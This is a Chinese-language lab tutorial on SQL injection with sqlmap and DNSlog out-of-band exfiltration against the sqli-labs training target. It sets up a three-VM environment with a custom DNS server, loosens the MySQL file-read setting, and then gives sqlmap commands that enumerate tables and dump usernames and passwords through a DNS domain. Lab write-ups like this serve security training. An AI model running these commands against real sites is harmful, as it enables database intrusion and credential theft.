sqlmap结合dnslog快速注入

如何使用sqlmap结合dnslog快速注入呢

首先我们需要三台虚拟机，一台Windows10作为客户端，Windows server2008作为服务器，还有一台kali。

第一步：先在Windows10上下载phpstudy小皮面板，然后后下载sqli-labs靶场，并将sqli-labs靶场文件放入WWW目录下

第二步：修改数据库配置文件，将数据库的my.ini中添加secure_file_priv=""，方便后面读取文件

第三步：在Windows　server　２００８上搭建DNS服务器

单击角色－－＞添加角色－－＞点击服务器角色－－＞选中DNS服务器－－＞下一步－－＞安装

右键查看WIN-JGVPSZCQ80R的属性－－＞监视－－＞勾上两个测试类型－－＞确定

 新建区域:右键点击新建－－＞下一步－－＞自定义一个区域名称－－＞下一步－－＞完成

 新建主机ns1.ceshi.top,这样填上kali虚拟机的IP地址

 再创建一个泛解析:

 第四步:在Windows10上配置DNS服务器的IP 

 第五步:使用Windows10pingDNS中创建的域名,并在kali中查看

 

 第六步:在Windows server2008中创建转发器

 使用Windows10ping转发器的域名,并在kali中查看

第七步:sqlmap使用DNSlog外带注入

 我们使用sqlmap找到数据库中的表名

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D security --tables

 根据users表名找表中的列

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security" -t "users" --columns

取出users表中的数据

sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security" -t "users" -C "username,password" --dump